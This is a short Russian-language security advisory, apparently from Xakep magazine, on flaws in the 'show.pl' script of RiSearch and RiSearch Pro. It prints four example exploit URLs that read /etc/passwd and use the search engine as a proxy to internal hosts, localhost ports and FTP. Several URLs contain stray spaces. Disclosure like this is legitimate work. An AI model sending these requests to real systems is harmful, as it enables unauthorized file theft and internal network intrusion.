Удаленный неавторизованный доступ в RiSearch и RiSearch Pro

Рекомендуем почитать:

Xakep #299. Sysmon

• Содержание выпуска
• Подписка на «Хакер»-60%

Программа: RiSearch/RiSearch Pro 1.0.01, 3.2.06 

Несколько уязвимостей обнаружено в RiSearch и RiSearch Pro в 'show.pl'. Удаленный пользователь может получить файлы на целевой системе, которые расположены вне Web каталога. Удаленный пользователь может также использовать поисковый движок как открытый прокси, чтобы подключится к портам на произвольных системах. 

1. Просмотр произвольных файлов: 

http://10.0.0.0/cgi-bin/search/show.pl?url= file:/etc/passwd

2. Доступ к сайтам в локальной сети: 

http://10.0.0.0/cgi-bin/search/show.pl?url= http://192.168.0.1

3. Доступ к другим портам через HTTP протокол: 

http://10.0.0.0/cgi-bin/search/sho w.pl?url= http://localhost:8080

4. Доступ к FTP: 

http://10.0.0.0/cgi-bin/search/show.pl?url= ftp://192.1 68.0.1